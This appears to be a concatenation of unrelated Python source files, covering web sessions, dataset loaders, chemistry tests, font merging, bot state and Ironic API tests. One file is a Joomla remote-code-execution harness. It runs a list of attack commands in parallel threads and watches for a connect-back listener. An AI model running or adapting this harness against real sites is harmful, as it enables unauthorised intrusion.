in mutable structures are not tracked, for those you have to set
`modified` to `True` by hand.
"""
__slots__ = ModificationTrackingDict.__slots__ + ("sid", "new")
def __init__(self, data, sid, new=False):
ModificationTrackingDict.__init__(self, data)
self.sid = sid
self.new = new
def __repr__(self):
return "<%s %s%s>" % (
self.__class__.__name__,
dict.__repr__(self),
"*" if self.should_save else "",
)
@property
def should_save(self):
"""True if the session should be saved.
.. versionchanged:: 0.6
By default the session is now only saved if the session is
modified, not if it is new like it was before.
"""
return self.modified
class SessionStore(object):
"""Baseclass for all session stores. The Werkzeug contrib module does not
implement any useful stores besides the filesystem store, application
developers are encouraged to create their own stores.
:param session_class: The session class to use. Defaults to
:class:`Session`.
"""
def __init__(self, session_class=None):
if session_class is None:
session_class = Session
self.session_class = session_class
def is_valid_key(self, key):
"""Check if a key has the correct format."""
return _sha1_re.match(key) is not None
def generate_key(self, salt=None):
"""Simple function that generates a new session key."""
return generate_key(salt)
def new(self):
"""Generate a new session."""
return self.session_class({}, self.generate_key(), True)
def save(self, session):
"""Save a session."""
def save_if_modified(self, session):
"""Save if a session class wants an update."""
if session.should_save:
self.save(session)
def delete(self, session):
"""Delete a session."""
def get(self, sid):
"""Get a session for this sid or a new session object. This method
has to check if the session key is valid and create a new session if
that wasn't the case.
"""
return self.session_class({}, sid, True)
#: used for temporary files by the filesystem session store
_fs_transaction_suffix = ".__wz_sess"
class FilesystemSessionStore(SessionStore):
"""Simple example session store that saves sessions on the filesystem.
This store works best on POSIX systems and Windows Vista / Windows
Server 2008 and newer.
.. versionchanged:: 0.6
`renew_missing` was added. Previously this was considered `True`,
now the default changed to `False` and it can be explicitly
deactivated.
:param path: the path to the folder used for storing the sessions.
If not provided the default temporary directory is used.
:param filename_template: a string template used to give the session
a filename. ``%s`` is replaced with the
session id.
:param session_class: The session class to use. Defaults to
:class:`Session`.
:param renew_missing: set to `True` if you want the store to
give the user a new sid if the session was
not yet saved.
"""
def __init__(
self,
path=None,
filename_template="werkzeug_%s.sess",
session_class=None,
renew_missing=False,
mode=0o644,
):
SessionStore.__init__(self, session_class)
if path is None:
path = tempfile.gettempdir()
self.path = path
if isinstance(filename_template, text_type) and PY2:
filename_template = filename_template.encode(get_filesystem_encoding())
assert not filename_template.endswith(_fs_transaction_suffix), (
"filename templates may not end with %s" % _fs_transaction_suffix
)
self.filename_template = filename_template
self.renew_missing = renew_missing
self.mode = mode
def get_session_filename(self, sid):
# out of the box, this should be a strict ASCII subset but
# you might reconfigure the session object to have a more
# arbitrary string.
if isinstance(sid, text_type) and PY2:
sid = sid.encode(get_filesystem_encoding())
return path.join(self.path, self.filename_template % sid)
def save(self, session):
fn = self.get_session_filename(session.sid)
fd, tmp = tempfile.mkstemp(suffix=_fs_transaction_suffix, dir=self.path)
f = os.fdopen(fd, "wb")
try:
dump(dict(session), f, HIGHEST_PROTOCOL)
finally:
f.close()
try:
rename(tmp, fn)
os.chmod(fn, self.mode)
except (IOError, OSError):
pass
def delete(self, session):
fn = self.get_session_filename(session.sid)
try:
os.unlink(fn)
except OSError:
pass
def get(self, sid):
if not self.is_valid_key(sid):
return self.new()
try:
f = open(self.get_session_filename(sid), "rb")
except IOError:
if self.renew_missing:
return self.new()
data = {}
else:
try:
try:
data = load(f)
except Exception:
data = {}
finally:
f.close()
return self.session_class(data, sid, False)
def list(self):
"""Lists all sessions in the store.
.. versionadded:: 0.6
"""
before, after = self.filename_template.split("%s", 1)
filename_re = re.compile(
r"%s(.{5,})%s$" % (re.escape(before), re.escape(after))
)
result = []
for filename in os.listdir(self.path):
#: this is a session that is still being saved.
if filename.endswith(_fs_transaction_suffix):
continue
match = filename_re.match(filename)
if match is not None:
result.append(match.group(1))
return result
class SessionMiddleware(object):
"""A simple middleware that puts the session object of a store provided
into the WSGI environ. It automatically sets cookies and restores
sessions.
However a middleware is not the preferred solution because it won't be as
fast as sessions managed by the application itself and will put a key into
the WSGI environment only relevant for the application which is against
the concept of WSGI.
The cookie parameters are the same as for the :func:`~dump_cookie`
function just prefixed with ``cookie_``. Additionally `max_age` is
called `cookie_age` and not `cookie_max_age` because of backwards
compatibility.
"""
def __init__(
self,
app,
store,
cookie_name="session_id",
cookie_age=None,
cookie_expires=None,
cookie_path="/",
cookie_domain=None,
cookie_secure=None,
cookie_httponly=False,
cookie_samesite="Lax",
environ_key="werkzeug.session",
):
self.app = app
self.store = store
self.cookie_name = cookie_name
self.cookie_age = cookie_age
self.cookie_expires = cookie_expires
self.cookie_path = cookie_path
self.cookie_domain = cookie_domain
self.cookie_secure = cookie_secure
self.cookie_httponly = cookie_httponly
self.cookie_samesite = cookie_samesite
self.environ_key = environ_key
def __call__(self, environ, start_response):
cookie = parse_cookie(environ.get("HTTP_COOKIE", ""))
sid = cookie.get(self.cookie_name, None)
if sid is None:
session = self.store.new()
else:
session = self.store.get(sid)
environ[self.environ_key] = session
def injecting_start_response(status, headers, exc_info=None):
if session.should_save:
self.store.save(session)
headers.append(
(
"Set-Cookie",
dump_cookie(
self.cookie_name,
session.sid,
self.cookie_age,
self.cookie_expires,
self.cookie_path,
self.cookie_domain,
self.cookie_secure,
self.cookie_httponly,
samesite=self.cookie_samesite,
),
)
)
return start_response(status, headers, exc_info)
return ClosingIterator(
self.app(environ, injecting_start_response),
lambda: self.store.save_if_modified(session),
)
|
datasets/bc2gm_corpus/bc2gm_corpus.py | dkajtoch/datasets | 10,608 | 12739424 |
# coding=utf-8
# Copyright 2020 HuggingFace Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""BioCreative II gene mention recognition Corpus"""
import datasets
logger = datasets.logging.get_logger(__name__)
_CITATION = """\
@article{smith2008overview,
title={Overview of BioCreative II gene mention recognition},
author={<NAME> and <NAME>, <NAME>, <NAME> and <NAME> and others},
journal={Genome biology},
volume={9},
number={S2},
pages={S2},
year={2008},
publisher={Springer}
}
"""
_DESCRIPTION = """\
Nineteen teams presented results for the Gene Mention Task at the BioCreative II Workshop.
In this task participants designed systems to identify substrings in sentences corresponding to gene name mentions.
A variety of different methods were used and the results varied with a highest achieved F1 score of 0.8721.
Here we present brief descriptions of all the methods used and a statistical analysis of the results.
We also demonstrate that, by combining the results from all submissions, an F score of 0.9066 is feasible,
and furthermore that the best result makes use of the lowest scoring submissions.
For more details, see: https://www.ncbi.nlm.nih.gov/pmc/articles/PMC2559986/
The original dataset can be downloaded from: https://biocreative.bioinformatics.udel.edu/resources/corpora/biocreative-ii-corpus/
This dataset has been converted to CoNLL format for NER using the following tool: https://github.com/spyysalo/standoff2conll
"""
_HOMEPAGE = "https://www.ncbi.nlm.nih.gov/pmc/articles/PMC2559986/"
_URL = "https://github.com/spyysalo/bc2gm-corpus/raw/master/conll/"
_TRAINING_FILE = "train.tsv"
_DEV_FILE = "devel.tsv"
_TEST_FILE = "test.tsv"
class Bc2gmCorpusConfig(datasets.BuilderConfig):
"""BuilderConfig for Bc2gmCorpus"""
def __init__(self, **kwargs):
"""BuilderConfig for Bc2gmCorpus.
Args:
**kwargs: keyword arguments forwarded to super.
"""
super(Bc2gmCorpusConfig, self).__init__(**kwargs)
class Bc2gmCorpus(datasets.GeneratorBasedBuilder):
"""Bc2gmCorpus dataset."""
BUILDER_CONFIGS = [
Bc2gmCorpusConfig(name="bc2gm_corpus", version=datasets.Version("1.0.0"), description="bc2gm corpus"),
]
def _info(self):
return datasets.DatasetInfo(
description=_DESCRIPTION,
features=datasets.Features(
{
"id": datasets.Value("string"),
"tokens": datasets.Sequence(datasets.Value("string")),
"ner_tags": datasets.Sequence(
datasets.features.ClassLabel(
names=[
"O",
"B-GENE",
"I-GENE",
]
)
),
}
),
supervised_keys=None,
homepage=_HOMEPAGE,
citation=_CITATION,
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
urls_to_download = {
"train": f"{_URL}{_TRAINING_FILE}",
"dev": f"{_URL}{_DEV_FILE}",
"test": f"{_URL}{_TEST_FILE}",
}
downloaded_files = dl_manager.download_and_extract(urls_to_download)
return [
datasets.SplitGenerator(name=datasets.Split.TRAIN, gen_kwargs={"filepath": downloaded_files["train"]}),
datasets.SplitGenerator(name=datasets.Split.VALIDATION, gen_kwargs={"filepath": downloaded_files["dev"]}),
datasets.SplitGenerator(name=datasets.Split.TEST, gen_kwargs={"filepath": downloaded_files["test"]}),
]
def _generate_examples(self, filepath):
logger.info("⏳ Generating examples from = %s", filepath)
with open(filepath, encoding="utf-8") as f:
guid = 0
tokens = []
ner_tags = []
for line in f:
if line == "" or line == "\n":
if tokens:
yield guid, {
"id": str(guid),
"tokens": tokens,
"ner_tags": ner_tags,
}
guid += 1
tokens = []
ner_tags = []
else:
# tokens are tab separated
splits = line.split("\t")
tokens.append(splits[0])
ner_tags.append(splits[1].rstrip())
# last example
yield guid, {
"id": str(guid),
"tokens": tokens,
"ner_tags": ner_tags,
}
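# Minimal local usage sketch (not part of the original script). It assumes the
# `datasets` library is installed and that this file is saved as bc2gm_corpus.py
# next to the caller.
if __name__ == "__main__":
    from datasets import load_dataset

    # Loading the builder from its script path downloads the CoNLL files and
    # builds the train/validation/test splits defined above.
    corpus = load_dataset("./bc2gm_corpus.py", name="bc2gm_corpus")
    sample = corpus["train"][0]
    print(sample["tokens"][:10])
    print(sample["ner_tags"][:10])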
|
rdkit/Chem/UnitTestChemSmarts.py | kazuyaujihara/rdkit | 1,609 | 12739425 |
# $Id$
#
# Copyright (C) 2003-2006 Rational Discovery LLC
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
"""basic unit testing code for the wrapper of the SMARTS matcher
"""
from rdkit import RDConfig
import unittest
import os.path
from rdkit import Chem
class TestCase(unittest.TestCase):
def setUp(self):
#print '\n%s: '%self.shortDescription(),
fName = os.path.join(RDConfig.RDCodeDir, 'Chem', 'test_data', 'quinone.mol')
self.m = Chem.MolFromMolFile(fName)
assert self.m.GetNumAtoms() == 8, 'bad nAtoms'
def testMatch(self):
" testing smarts match "
p = Chem.MolFromSmarts('CC(=O)C')
matches = self.m.GetSubstructMatches(p)
    assert len(matches) == 2, 'bad UMapList: %s' % (str(matches))
for match in matches:
assert len(match) == 4, 'bad match: %s' % (str(match))
def testOrder(self):
" testing atom order in smarts match "
p = Chem.MolFromSmarts('CC(=O)C')
matches = self.m.GetSubstructMatches(p)
m = matches[0]
atomList = [self.m.GetAtomWithIdx(x).GetSymbol() for x in m]
assert atomList == ['C', 'C', 'O', 'C'], 'bad atom ordering: %s' % str(atomList)
if __name__ == '__main__':
unittest.main()
|
utils_scripts/joomla_rce_exploiter.py | fakegit/google_explorer | 155 | 12739431 | """
Usage:
joomla_rce_exploiter.py --file=<arg>
joomla_rce_exploiter.py --help
joomla_rce_exploiter.py --version
Options:
-h --help Open help menu
-v --version Show version
Required options:
--file='arq' arq
"""
import threading
import os
import sys
import time
import commands
import Queue
from threading import Thread
from docopt import docopt, DocoptExit
tested = []
class JoomlaRceSpliter():
def listener(self, filename):
global tested
with open(filename, 'r') as f:
port = f.readline().split()[-1]
cmd = 'a=$(netstat -plnt 2>&1 | grep {0} -c); echo $a'.format(port)
kill = 'id=$(pgrep -f {0}); kill -9 $id'.format(filename)
while True:
s, o = commands.getstatusoutput(cmd)
if o == '0':
print '[+] \033[31mVulnerable!!\033[33m Joomla RCE woked..\033[39m\n'
print tested
os.system('id=$(pgrep -f vuln_joomla_2015_8562.txt); kill -9 $id')
sys.exit(0)
#def exploiter(self, filename):
# global cont
# cont=1
# with open(filename, 'r') as f:
# for target in f.readlines():
# os.system(target.rstrip())
# cont+=1
def exploiter(self, q):
global tested
while True:
try:
target = q.get()
tested.append(target)
os.system(target)
q.task_done()
except:
q.task_done()
if __name__ == '__main__':
arguments = docopt(__doc__, version="Joomla Spliter - Google Explorer - 2016")
filename = arguments['--file']
x = JoomlaRceSpliter()
Thread(target=x.listener, args=(filename,)).start()
results = [line.rstrip('\n') for line in open(filename)]
# My Queue
q = Queue.Queue(maxsize=0)
# Number of threads
num_threads = 10
for tgt in results:
q.put(tgt)
# My threads
print('[*] Starting evil threads =)...\n')
for i in range(num_threads):
worker = Thread(target=x.exploiter, args=(q,))
worker.setDaemon(True)
worker.start()
q.join()
#os.system('id=$(pgrep -f vuln_joomla_2015_8562.txt); kill -9 $id 2>&1 ')
|
libraries/botbuilder-core/botbuilder/core/bot_state.py | Fl4v/botbuilder-python | 388 | 12739446 | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
from abc import abstractmethod
from copy import deepcopy
from typing import Callable, Dict, Union
from jsonpickle.pickler import Pickler
from botbuilder.core.state_property_accessor import StatePropertyAccessor
from .bot_assert import BotAssert
from .turn_context import TurnContext
from .storage import Storage
from .property_manager import PropertyManager
class CachedBotState:
"""
Internal cached bot state.
"""
def __init__(self, state: Dict[str, object] = None):
self.state = state if state is not None else {}
self.hash = self.compute_hash(state)
@property
def is_changed(self) -> bool:
return self.hash != self.compute_hash(self.state)
def compute_hash(self, obj: object) -> str:
return str(Pickler().flatten(obj))
class BotState(PropertyManager):
"""
Defines a state management object and automates the reading and writing of
associated state properties to a storage layer.
.. remarks::
Each state management object defines a scope for a storage layer.
State properties are created within a state management scope, and the Bot Framework
defines these scopes: :class:`ConversationState`, :class:`UserState`, and :class:`PrivateConversationState`.
You can define additional scopes for your bot.
"""
def __init__(self, storage: Storage, context_service_key: str):
"""
Initializes a new instance of the :class:`BotState` class.
:param storage: The storage layer this state management object will use to store and retrieve state
        :type storage: :class:`botbuilder.core.Storage`
:param context_service_key: The key for the state cache for this :class:`BotState`
:type context_service_key: str
.. remarks::
            This constructor creates a state management object and associated scope. The object uses
            the ``storage`` argument to persist state property values and the ``context_service_key``
            argument to cache state within the context for each turn.
        :raises: An argument null exception if a required argument is missing.
"""
self.state_key = "state"
self._storage = storage
self._context_service_key = context_service_key
def get_cached_state(self, turn_context: TurnContext):
"""
Gets the cached bot state instance that wraps the raw cached data for this "BotState"
from the turn context.
:param turn_context: The context object for this turn.
:type turn_context: :class:`TurnContext`
:return: The cached bot state instance.
"""
BotAssert.context_not_none(turn_context)
return turn_context.turn_state.get(self._context_service_key)
def create_property(self, name: str) -> StatePropertyAccessor:
"""
Creates a property definition and registers it with this :class:`BotState`.
:param name: The name of the property
:type name: str
:return: If successful, the state property accessor created
:rtype: :class:`StatePropertyAccessor`
"""
if not name:
raise TypeError("BotState.create_property(): name cannot be None or empty.")
return BotStatePropertyAccessor(self, name)
def get(self, turn_context: TurnContext) -> Dict[str, object]:
BotAssert.context_not_none(turn_context)
cached = self.get_cached_state(turn_context)
return getattr(cached, "state", None)
async def load(self, turn_context: TurnContext, force: bool = False) -> None:
"""
Reads the current state object and caches it in the context object for this turn.
:param turn_context: The context object for this turn
:type turn_context: :class:`TurnContext`
:param force: Optional, true to bypass the cache
:type force: bool
"""
BotAssert.context_not_none(turn_context)
cached_state = self.get_cached_state(turn_context)
storage_key = self.get_storage_key(turn_context)
if force or not cached_state or not cached_state.state:
items = await self._storage.read([storage_key])
val = items.get(storage_key)
turn_context.turn_state[self._context_service_key] = CachedBotState(val)
async def save_changes(
self, turn_context: TurnContext, force: bool = False
) -> None:
"""
        Saves the state cached in the current context for this turn if it has changed.
:param turn_context: The context object for this turn
:type turn_context: :class:`TurnContext`
:param force: Optional, true to save state to storage whether or not there are changes
:type force: bool
"""
BotAssert.context_not_none(turn_context)
cached_state = self.get_cached_state(turn_context)
if force or (cached_state is not None and cached_state.is_changed):
storage_key = self.get_storage_key(turn_context)
changes: Dict[str, object] = {storage_key: cached_state.state}
await self._storage.write(changes)
cached_state.hash = cached_state.compute_hash(cached_state.state)
async def clear_state(self, turn_context: TurnContext):
"""
Clears any state currently stored in this state scope.
:param turn_context: The context object for this turn
:type turn_context: :class:`TurnContext`
:return: None
.. remarks::
This function must be called in order for the cleared state to be persisted to the underlying store.
"""
BotAssert.context_not_none(turn_context)
# Explicitly setting the hash will mean IsChanged is always true. And that will force a Save.
cache_value = CachedBotState()
cache_value.hash = ""
turn_context.turn_state[self._context_service_key] = cache_value
async def delete(self, turn_context: TurnContext) -> None:
"""
Deletes any state currently stored in this state scope.
:param turn_context: The context object for this turn
:type turn_context: :class:`TurnContext`
:return: None
"""
BotAssert.context_not_none(turn_context)
turn_context.turn_state.pop(self._context_service_key)
storage_key = self.get_storage_key(turn_context)
await self._storage.delete({storage_key})
@abstractmethod
def get_storage_key(self, turn_context: TurnContext) -> str:
raise NotImplementedError()
async def get_property_value(self, turn_context: TurnContext, property_name: str):
"""
Gets the value of the specified property in the turn context.
:param turn_context: The context object for this turn
:type turn_context: :class:`TurnContext`
:param property_name: The property name
:type property_name: str
:return: The value of the property
"""
BotAssert.context_not_none(turn_context)
if not property_name:
raise TypeError(
"BotState.get_property_value(): property_name cannot be None."
)
cached_state = self.get_cached_state(turn_context)
        # if there is no value, this will throw, to signal to IPropertyAccessor that a default value should be computed
# This allows this to work with value types
return cached_state.state[property_name]
async def delete_property_value(
self, turn_context: TurnContext, property_name: str
) -> None:
"""
Deletes a property from the state cache in the turn context.
:param turn_context: The context object for this turn
        :type turn_context: :class:`TurnContext`
:param property_name: The name of the property to delete
:type property_name: str
:return: None
"""
BotAssert.context_not_none(turn_context)
if not property_name:
raise TypeError("BotState.delete_property(): property_name cannot be None.")
cached_state = self.get_cached_state(turn_context)
del cached_state.state[property_name]
async def set_property_value(
self, turn_context: TurnContext, property_name: str, value: object
) -> None:
"""
Sets a property to the specified value in the turn context.
:param turn_context: The context object for this turn
:type turn_context: :class:`TurnContext`
:param property_name: The property name
:type property_name: str
:param value: The value to assign to the property
:type value: Object
:return: None
"""
BotAssert.context_not_none(turn_context)
if not property_name:
raise TypeError("BotState.delete_property(): property_name cannot be None.")
cached_state = self.get_cached_state(turn_context)
cached_state.state[property_name] = value
class BotStatePropertyAccessor(StatePropertyAccessor):
"""
Defines methods for accessing a state property created in a :class:`BotState` object.
"""
def __init__(self, bot_state: BotState, name: str):
"""
Initializes a new instance of the :class:`BotStatePropertyAccessor` class.
:param bot_state: The state object to access
:type bot_state: :class:`BotState`
:param name: The name of the state property to access
:type name: str
"""
self._bot_state = bot_state
self._name = name
@property
def name(self) -> str:
"""
The name of the property.
"""
return self._name
async def delete(self, turn_context: TurnContext) -> None:
"""
Deletes the property.
:param turn_context: The context object for this turn
:type turn_context: :class:`TurnContext`
"""
await self._bot_state.load(turn_context, False)
await self._bot_state.delete_property_value(turn_context, self._name)
async def get(
self,
turn_context: TurnContext,
default_value_or_factory: Union[Callable, object] = None,
) -> object:
"""
Gets the property value.
:param turn_context: The context object for this turn
:type turn_context: :class:`TurnContext`
:param default_value_or_factory: Defines the default value for the property
"""
await self._bot_state.load(turn_context, False)
try:
result = await self._bot_state.get_property_value(turn_context, self._name)
return result
except:
# ask for default value from factory
if not default_value_or_factory:
return None
result = (
default_value_or_factory()
if callable(default_value_or_factory)
else deepcopy(default_value_or_factory)
)
# save default value for any further calls
await self.set(turn_context, result)
return result
async def set(self, turn_context: TurnContext, value: object) -> None:
"""
Sets the property value.
:param turn_context: The context object for this turn
:type turn_context: :class:`TurnContext`
:param value: The value to assign to the property
"""
await self._bot_state.load(turn_context, False)
await self._bot_state.set_property_value(turn_context, self._name, value)
|
src/hypercorn/__init__.py | ai-mocap/hypercorn | 264 | 12739451 | from __future__ import annotations
from .__about__ import __version__
from .config import Config
__all__ = ("__version__", "Config")
|
Torch-1 DDPG/Torch-1 DDPG CPU/main.py | summerRainn/DeepLearningNotes | 345 | 12739454 | """@author: Young
@license: (C) Copyright 2013-2017
@contact: <EMAIL>
@file: main.py
@time: 2018/1/17 10:02
"""
import gc
import gym
from agent.agent import Agent
MAX_EPISODES = 5000
env = gym.make('BipedalWalker-v2')
state_size = env.observation_space.shape[0]
action_size = env.action_space.shape[0]
agent = Agent(state_size, action_size)
state = env.reset()
for _ in range(int(1e3)):
action = agent.get_exploration_policy(state)
next_state, reward, done, info = env.step(action)
agent.append(state, action, reward, done, next_state)
state = next_state
if done:
state = env.reset()
for _ep in range(MAX_EPISODES):
state = env.reset()
count = 0
while True:
count += 1
# env.render()
action = agent.get_exploration_policy(state)
next_state, reward, done, info = env.step(action)
agent.append(state, action, reward, done, next_state)
state = next_state
agent.optimize()
if done:
state = env.reset()
break
gc.collect()
if _ep % 100 == 0:
print("{} - score: {}".format(_ep, count))
agent.save_models(_ep)
|
toolbox/data.py | henrytseng/srcnn | 125 | 12739459 | from functools import partial
import numpy as np
from keras.preprocessing.image import img_to_array
from keras.preprocessing.image import load_img
from toolbox.image import bicubic_rescale
from toolbox.image import modcrop
from toolbox.paths import data_dir
def load_set(name, lr_sub_size=11, lr_sub_stride=5, scale=3):
hr_sub_size = lr_sub_size * scale
hr_sub_stride = lr_sub_stride * scale
lr_gen_sub = partial(generate_sub_images, size=lr_sub_size,
stride=lr_sub_stride)
hr_gen_sub = partial(generate_sub_images, size=hr_sub_size,
stride=hr_sub_stride)
lr_sub_arrays = []
hr_sub_arrays = []
for path in (data_dir / name).glob('*'):
lr_image, hr_image = load_image_pair(str(path), scale=scale)
lr_sub_arrays += [img_to_array(img) for img in lr_gen_sub(lr_image)]
hr_sub_arrays += [img_to_array(img) for img in hr_gen_sub(hr_image)]
x = np.stack(lr_sub_arrays)
y = np.stack(hr_sub_arrays)
return x, y
def load_image_pair(path, scale=3):
image = load_img(path)
image = image.convert('YCbCr')
hr_image = modcrop(image, scale)
lr_image = bicubic_rescale(hr_image, 1 / scale)
return lr_image, hr_image
def generate_sub_images(image, size, stride):
for i in range(0, image.size[0] - size + 1, stride):
for j in range(0, image.size[1] - size + 1, stride):
yield image.crop([i, j, i + size, j + size])
|
crabageprediction/venv/Lib/site-packages/fontTools/merge/base.py | 13rianlucero/CrabAgePrediction | 2,705 | 12739467 | # Copyright 2013 Google, Inc. All Rights Reserved.
#
# Google Author(s): <NAME>, <NAME>
from fontTools.ttLib.tables.DefaultTable import DefaultTable
import logging
log = logging.getLogger("fontTools.merge")
def add_method(*clazzes, **kwargs):
"""Returns a decorator function that adds a new method to one or
more classes."""
allowDefault = kwargs.get('allowDefaultTable', False)
def wrapper(method):
done = []
for clazz in clazzes:
if clazz in done: continue # Support multiple names of a clazz
done.append(clazz)
assert allowDefault or clazz != DefaultTable, 'Oops, table class not found.'
assert method.__name__ not in clazz.__dict__, \
"Oops, class '%s' has method '%s'." % (clazz.__name__, method.__name__)
setattr(clazz, method.__name__, method)
return None
return wrapper
def mergeObjects(lst):
lst = [item for item in lst if item is not NotImplemented]
if not lst:
return NotImplemented
lst = [item for item in lst if item is not None]
if not lst:
return None
clazz = lst[0].__class__
assert all(type(item) == clazz for item in lst), lst
logic = clazz.mergeMap
returnTable = clazz()
returnDict = {}
allKeys = set.union(set(), *(vars(table).keys() for table in lst))
for key in allKeys:
try:
mergeLogic = logic[key]
except KeyError:
try:
mergeLogic = logic['*']
except KeyError:
raise Exception("Don't know how to merge key %s of class %s" %
(key, clazz.__name__))
if mergeLogic is NotImplemented:
continue
value = mergeLogic(getattr(table, key, NotImplemented) for table in lst)
if value is not NotImplemented:
returnDict[key] = value
returnTable.__dict__ = returnDict
return returnTable
@add_method(DefaultTable, allowDefaultTable=True)
def merge(self, m, tables):
if not hasattr(self, 'mergeMap'):
log.info("Don't know how to merge '%s'.", self.tableTag)
return NotImplemented
logic = self.mergeMap
if isinstance(logic, dict):
return m.mergeObjects(self, self.mergeMap, tables)
else:
return logic(tables)
|
ironic/tests/unit/api/controllers/v1/test_event.py | yanndegat/ironic | 350 | 12739470 |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests for the API /events methods.
"""
from http import client as http_client
from unittest import mock
from keystonemiddleware import auth_token
from oslo_config import cfg
from ironic.api.controllers import base as api_base
from ironic.api.controllers.v1 import event
from ironic.api.controllers.v1 import versions
from ironic.common import args
from ironic.common import exception
from ironic.tests import base as test_base
from ironic.tests.unit.api import base as test_api_base
def get_fake_port_event():
return {'event': 'network.bind_port',
'port_id': '11111111-aaaa-bbbb-cccc-555555555555',
'mac_address': 'de:ad:ca:fe:ba:be',
'status': 'ACTIVE',
'device_id': '22222222-aaaa-bbbb-cccc-555555555555',
'binding:host_id': '22222222-aaaa-bbbb-cccc-555555555555',
'binding:vnic_type': 'baremetal'}
class TestEventValidator(test_base.TestCase):
def setUp(self):
super(TestEventValidator, self).setUp()
self.v_event = event.NETWORK_EVENT_VALIDATOR
self.v_events = args.schema(event.EVENTS_SCHEMA)
def test_simple_event_type(self):
self.v_events('body', {'events': [get_fake_port_event()]})
def test_invalid_event_type(self):
value = {'events': [{'event': 'invalid.event'}]}
self.assertRaisesRegex(exception.Invalid,
"Schema error for body: "
"'invalid.event' is not one of",
self.v_events, 'body', value)
    def test_event_missing_mandatory_field(self):
value = {'invalid': 'invalid'}
self.assertRaisesRegex(exception.Invalid,
"Schema error for event: "
"'event' is a required property",
self.v_event, 'event', value)
def test_invalid_mac_network_port_event(self):
value = {'event': 'network.bind_port',
'port_id': '11111111-aaaa-bbbb-cccc-555555555555',
'mac_address': 'INVALID_MAC_ADDRESS',
'status': 'ACTIVE',
'device_id': '22222222-aaaa-bbbb-cccc-555555555555',
'binding:host_id': '22222222-aaaa-bbbb-cccc-555555555555',
'binding:vnic_type': 'baremetal'
}
self.assertRaisesRegex(exception.Invalid,
'Expected valid MAC address for mac_address: '
'INVALID_MAC_ADDRESS',
self.v_event, 'event', value)
def test_missing_mandatory_fields_network_port_event(self):
value = {'event': 'network.bind_port',
'device_id': '22222222-aaaa-bbbb-cccc-555555555555',
'binding:host_id': '22222222-aaaa-bbbb-cccc-555555555555',
'binding:vnic_type': 'baremetal'
}
self.assertRaisesRegex(exception.Invalid,
"Schema error for event: "
"'port_id' is a required property",
self.v_event, 'event', value)
class TestPost(test_api_base.BaseApiTest):
def setUp(self):
super(TestPost, self).setUp()
self.headers = {api_base.Version.string: str(
versions.max_version_string())}
def test_events(self):
events_dict = {'events': [get_fake_port_event()]}
response = self.post_json('/events', events_dict, headers=self.headers)
self.assertEqual(http_client.NO_CONTENT, response.status_int)
def test_multiple_events(self):
events_dict = {'events': [get_fake_port_event(),
get_fake_port_event(),
get_fake_port_event()]}
response = self.post_json('/events', events_dict, headers=self.headers)
self.assertEqual(http_client.NO_CONTENT, response.status_int)
def test_events_does_not_contain_event(self):
events_dict = {'events': [{'INVALID': 'fake.event'}]}
response = self.post_json('/events', events_dict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_events_invalid_event(self):
events_dict = {'events': [{'event': 'invalid.event'}]}
response = self.post_json('/events', events_dict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_network_unknown_event_property(self):
events_dict = {'events': [{'event': 'network.unbind_port',
'UNKNOWN': 'EVENT_PROPERTY'}]}
response = self.post_json('/events', events_dict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_network_bind_port_events(self):
events_dict = {'events': [get_fake_port_event()]}
response = self.post_json('/events', events_dict, headers=self.headers)
self.assertEqual(http_client.NO_CONTENT, response.status_int)
def test_network_unbind_port_events(self):
events_dict = {'events': [get_fake_port_event()]}
events_dict['events'][0].update({'event': 'network.unbind_port'})
response = self.post_json('/events', events_dict, headers=self.headers)
self.assertEqual(http_client.NO_CONTENT, response.status_int)
def test_network_delete_port_events(self):
events_dict = {'events': [get_fake_port_event()]}
events_dict['events'][0].update({'event': 'network.delete_port'})
response = self.post_json('/events', events_dict, headers=self.headers)
self.assertEqual(http_client.NO_CONTENT, response.status_int)
def test_network_port_event_invalid_mac_address(self):
port_evt = get_fake_port_event()
port_evt.update({'mac_address': 'INVALID_MAC_ADDRESS'})
events_dict = {'events': [port_evt]}
response = self.post_json('/events', events_dict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_network_port_event_invalid_device_id(self):
port_evt = get_fake_port_event()
port_evt.update({'device_id': 'DEVICE_ID_SHOULD_BE_UUID'})
events_dict = {'events': [port_evt]}
response = self.post_json('/events', events_dict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_network_port_event_invalid_port_id(self):
port_evt = get_fake_port_event()
port_evt.update({'port_id': 'PORT_ID_SHOULD_BE_UUID'})
events_dict = {'events': [port_evt]}
response = self.post_json('/events', events_dict, expect_errors=True,
headers=self.headers)
self.assertEqual(http_client.BAD_REQUEST, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertTrue(response.json['error_message'])
def test_network_port_event_invalid_status(self):
